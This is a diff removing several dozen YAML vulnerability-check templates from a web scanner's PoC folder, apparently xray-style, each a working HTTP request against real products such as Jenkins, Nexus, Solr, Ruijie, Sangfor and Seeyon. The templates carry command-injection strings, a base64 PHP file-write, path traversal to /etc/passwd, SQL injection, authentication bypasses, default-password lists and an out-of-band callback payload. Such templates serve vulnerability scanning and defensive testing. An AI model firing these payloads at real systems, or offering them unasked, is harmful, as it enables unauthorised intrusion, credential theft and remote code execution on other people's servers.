- https://juejin.cn/post/6961370156484263972


@ -1,15 +0,0 @@
name: poc-yaml-gitlab-cnvd-2021-14193-infoleak
rules:
- method: POST
path: /api/graphql
headers:
Content-Type: application/json
body: >-
{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl"))
detail:
author: 说书人(http://python.vin/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275


@ -1,10 +0,0 @@
name: poc-yaml-h3c-secparh-any-user-login
rules:
- method: GET
path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
expression: |
response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body))
detail:
author: Print1n(https://print1n.top)
links:
- https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E


@ -1,11 +0,0 @@
name: poc-yaml-hikvision-cve-2017-7921
rules:
- method: GET
path: /system/deviceInfo?auth=YWRtaW46MTEK
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<firmwareVersion>") && response.headers["content-type"] == "application/xml"
detail:
author: whwlsfb(https://github.com/whwlsfb)
links:
- https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html


@ -1,21 +0,0 @@
name: poc-yaml-iis-put-getshell
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
- method: PUT
path: /{(unknown)}.txt
body: |
{{fileContent}}
expression: |
response.status == 201
- method: GET
path: /{(unknown)}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
author: Cannae(github.com/thunderbarca)
links:
- https://www.cnblogs.com/-mo-/p/11295400.html


@ -1,15 +0,0 @@
name: poc-yaml-jboss-cve-2010-1871
set:
r1: randomInt(8000000, 10000000)
r2: randomInt(8000000, 10000000)
rules:
- method: GET
path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"].contains(string(r1 * r2))
detail:
author: fuping
links:
- http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871


@ -1,11 +0,0 @@
name: poc-yaml-jboss-unauth
rules:
- method: GET
path: /jmx-console/
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://xz.aliyun.com/t/6103


@ -1,14 +0,0 @@
name: poc-yaml-jenkins-cve-2018-1000861-rce
set:
rand: randomLowercase(4)
rules:
- method: GET
path: >-
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload;
follow_redirects: false
expression: >-
response.status == 200 && response.body.bcontains(bytes("package#" + rand))
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861


@ -1,21 +0,0 @@
name: poc-yaml-jenkins-unauthorized-access
set:
r1: randomInt(1000, 9999)
r2: randomInt(1000, 9999)
rules:
- method: GET
path: /script
follow_redirects: false
expression: response.status == 200
search: |
"Jenkins-Crumb", "(?P<var>.+?)"\);
- method: POST
path: /script
body: |
script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C
expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2)))
detail:
author: MrP01ntSun(https://github.com/MrPointSun)
links:
- https://www.cnblogs.com/yuzly/p/11255609.html
- https://blog.51cto.com/13770310/2156663


@ -1,21 +0,0 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/authentication/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/authentication/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh


@ -1,21 +0,0 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/users/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/users/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh


@ -1,12 +0,0 @@
name: poc-yaml-kingsoft-v8-default-password
rules:
- method: POST
path: /inter/ajax.php?cmd=get_user_login_cmd
body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://idc.wanyunshuju.com/aqld/2123.html


@ -1,12 +0,0 @@
name: poc-yaml-kingsoft-v8-file-read
rules:
- method: GET
path: >-
/htmltopdf/downfile.php?filename=/windows/win.ini
follow_redirects: false
expression: |
response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md


@ -1,11 +0,0 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///c://windows/win.ini"}}
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw


@ -1,11 +0,0 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///etc/passwd"}}
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw


@ -1,12 +0,0 @@
name: poc-yaml-lanproxy-cve-2021-3019-lfi
rules:
- method: GET
path: "/../conf/config.properties"
expression: |
response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
Affected Version: "lanproxy 0.1"
links:
- https://github.com/ffay/lanproxy/issues/152
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019


@ -1,11 +0,0 @@
name: poc-yaml-laravel-debug-info-leak
rules:
- method: POST
path: /
follow_redirects: false
expression: >
response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment &amp; details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper/tree/master/laravel/5_debug


@ -1,11 +0,0 @@
name: poc-yaml-laravel-improper-webdir
rules:
- method: GET
path: /storage/logs/laravel.log
follow_redirects: false
expression: >
response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper


@ -1,21 +0,0 @@
name: poc-yaml-mongo-express-cve-2019-10758
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /checkValid
headers:
Authorization: Basic YWRtaW46cGFzcw==
body: >-
document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}')
follow_redirects: true
expression: >
reverse.wait(5)
detail:
vulnpath: '/checkValid'
author: fnmsd(https://github.com/fnmsd)
description: 'Mongo Express CVE-2019-10758 Code Execution'
links:
- https://github.com/masahiro331/CVE-2019-10758
- https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html


@ -1,19 +0,0 @@
name: poc-yaml-netentsec-ngfw-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
r3: randomInt(800000000, 1000000000)
r4: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /directdata/direct/router
body: >-
{"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
expression: response.status == 200
- method: GET
path: /{{r2}}
expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g



@ -1,21 +0,0 @@
name: poc-yaml-nexus-cve-2020-10199
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/rest/beta/repositories/go/group"
headers:
Content-Type: application/json
body: |
{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
expression: |
response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31


@ -1,20 +0,0 @@
name: poc-yaml-nexus-cve-2020-10204
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/extdirect"
headers:
Content-Type: application/json
body: |
{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31


@ -1,22 +0,0 @@
name: poc-yaml-nexus-default-password
rules:
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 401
- method: GET
path: /nexus/service/local/authentication/login
headers:
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
expression: >
response.status == 200
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 200
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Nexus Repository Manager OSS"
links:
- https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager


@ -1,11 +0,0 @@
name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion
rules:
- method: GET
path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
follow_redirects: false
expression: >-
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613


@ -1,13 +0,0 @@
name: poc-yaml-phpmyadmin-setup-deserialization
rules:
- method: POST
path: /scripts/setup.php
body: >-
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
follow_redirects: false
expression: >-
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433


@ -1,19 +0,0 @@
name: poc-yaml-phpstudy-backdoor-rce
set:
r: randomLowercase(6)
payload: base64("printf(md5('" + r + "'));")
rules:
- method: GET
path: /index.php
headers:
Accept-Encoding: 'gzip,deflate'
Accept-Charset: '{{payload}}'
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(r)))
detail:
author: 17bdw
Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
vuln_url: "php_xmlrpc.dll"
links:
- https://www.freebuf.com/column/214946.html


@ -1,29 +0,0 @@
name: poc-yaml-weblogic-console-weak
sets:
username:
- weblogic
password:
- weblogic
- weblogic1
- welcome1
- Oracle@123
- weblogic123
payload:
- UTF-8
rules:
- method: HEAD
path: /console/j_security_check
follow_redirects: false
expression: |
response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
- method: POST
path: /console/j_security_check
follow_redirects: false
headers:
Content-type: application/x-www-form-urlencoded
body: |
j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
expression: |
!response.body.bcontains(b"LoginForm.jsp")
detail:
author: shadown1ng(https://github.com/shadown1ng)

WebScan/pocs/pocs.zip Normal file



@ -1,12 +0,0 @@
name: poc-yaml-qizhi-fortressaircraft-unauthorized
rules:
- method: GET
path: >-
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
expression: |
response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
detail:
author: we1x4n(https://we1x4n.com/)
links:
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw


@ -1,12 +0,0 @@
name: poc-yaml-rockmongo-default-password
rules:
- method: POST
path: /index.php?action=login.index&host=0
body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.runoob.com/mongodb/working-with-rockmongo.html


@ -1,24 +0,0 @@
name: poc-yaml-ruijie-eg-info-leak
rules:
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=admin&password=admin?show+webmaster+user
expression: "true"
search: |
{"data":".*?(?P<username>\w+)\s?(?P<password>\w+)","status":1}
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username={{username}}&password={{password}}
expression: |
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
detail:
author: Search?=Null
description: "Ruijie EG网关信息泄漏"
links:
- https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ


@ -1,29 +0,0 @@
name: poc-yaml-ruijie-eg-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
phpcode: >
"<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
payload: base64(phpcode)
rules:
- method: POST
path: "/guest_auth/guestIsUp.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
body: |
ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
expression: |
response.status == 200
- method: GET
path: "/guest_auth/{{r2}}.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
expression: |
response.body.bcontains(bytes(r1))
detail:
author: White(https://github.com/WhiteHSBG)
links:
- https://xz.aliyun.com/t/9016?page=1


@ -1,15 +0,0 @@
name: poc-yaml-ruijie-nbr1300g-cli-password-leak
rules:
- method: POST
path: /WEB_VMS/LEVEL15/
follow_redirects: false
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: |
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
expression: |
response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
detail:
author: abbin777
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html


@ -1,20 +0,0 @@
name: poc-yaml-ruijie-rce-cnvd-2021-09650
set:
r1: randomLowercase(9)
rules:
- method: POST
path: /guest_auth/guestIsUp.php
body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: /guest_auth/{{r1}}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"uid")
detail:
author: jdr
info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271/


@ -1,11 +0,0 @@
name: poc-yaml-ruijie-uac-cnvd-2021-14536
rules:
- method: GET
path: /login.php
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065


@ -1,22 +0,0 @@
name: poc-yaml-saltstack-cve-2021-25282-file-write
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /run
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
- method: POST
path: /run
headers:
Content-type: application/json
body: >-
{"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.anquanke.com/post/id/232748


@ -1,13 +0,0 @@
name: poc-yaml-sangfor-edr-arbitrary-admin-login
rules:
- method: GET
path: /ui/login.php?user=admin
follow_redirects: false
expression: >
response.status == 302 &&
response.body.bcontains(b"/download/edr_installer_") &&
response.headers["Set-Cookie"] != ""
detail:
author: hilson
links:
- https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA


@ -1,15 +0,0 @@
name: poc-yaml-sangfor-edr-cssp-rce
rules:
- method: POST
path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
{"params":"w=123\"'1234123'\"|id"}
expression: >
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)")
detail:
author: x1n9Qi8
Affected Version: "Sangfor EDR 3.2.17R1/3.2.21"
links:
- https://www.cnblogs.com/0day-li/p/13650452.html


@ -1,14 +0,0 @@
name: poc-yaml-sangfor-edr-tool-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(8)
rules:
- method: GET
path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: cookie
links:
- https://edr.sangfor.com.cn/


@ -1,11 +0,0 @@
name: poc-yaml-seeyon-a6-employee-info-leak
rules:
- method: GET
path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
expression:
response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md


@ -1,13 +0,0 @@
name: poc-yaml-seeyon-a6-test-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md


@ -1,16 +0,0 @@
name: poc-yaml-seeyon-ajax-unauthorized-access
rules:
- method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: |
response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: |
response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
detail:
author: x1n9Qi8
links:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html


@ -1,11 +0,0 @@
name: poc-yaml-seeyon-cnvd-2020-62422-readfile
rules:
- method: GET
path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
detail:
author: Aquilao(https://github.com/Aquilao)
info: seeyon readfile(CNVD-2020-62422)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422


@ -1,10 +0,0 @@
name: poc-yaml-seeyon-session-leak
rules:
- method: GET
path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
expression:
response.status == 200 && response.body.bcontains(b"<SessionList>\r\n<Session>\r\n<usrID>")
detail:
author: sakura404x
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md


@ -1,13 +0,0 @@
name: poc-yaml-seeyon-setextno-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md


@ -1,19 +0,0 @@
name: poc-yaml-seeyon-unauthoried
rules:
- method: POST
path: "/seeyon/thirdpartyController.do"
expression: "true"
body: |
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
search: >-
JSESSIONID=(?P<session>.+?)
- method: GET
path: "/seeyon/main.do"
headers:
Cookie: JSESSIONID={{session}}
expression: |
response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root


@ -1,25 +0,0 @@
name: poc-yaml-showdoc-uploadfile
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: /index.php?s=/home/page/uploadImg
headers:
Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633"
follow_redirects: false
body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n<?php echo \"{{r2}}\"; unlink(__FILE__); ?>\n----------------------------835846770881083140190633--"
expression: |
response.status == 200 && response.body.bcontains(b"success")
search: |
(?P<date>\d{4}-\d{2}-\d{2})\\/(?P<file>[a-f0-9]+\.php)
- method: GET
path: /Public/Uploads/{{date}}/{{file}}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r2))
detail:
author: White(https://github.com/WhiteHSBG)
Affected Version: "showdoc <= 2.8.6"
links:
- https://github.com/star7th/showdoc/pull/1059


@ -1,30 +0,0 @@
name: poc-yaml-solr-cve-2019-0193
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: /solr/admin/cores?wt=json
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: '"name":"(?P<core>.*?)"'
- method: POST
path: >-
/solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E
headers:
Content-Type: text/html
body: |-
<?xml version="1.0" encoding="utf-8"?>
<books>
<book>
</book>
</books>
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fnmsd(https://github.com/fnmsd)
solr_version: '<8.1.12'
vulnpath: '/solr/{{core}}/dataimport'
description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)'
links:
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193


@ -1,25 +0,0 @@
name: poc-yaml-solr-fileread1
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///etc/passwd
expression: |
response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body)
detail:
author: whami-root(https://github.com/whami-root)
links:
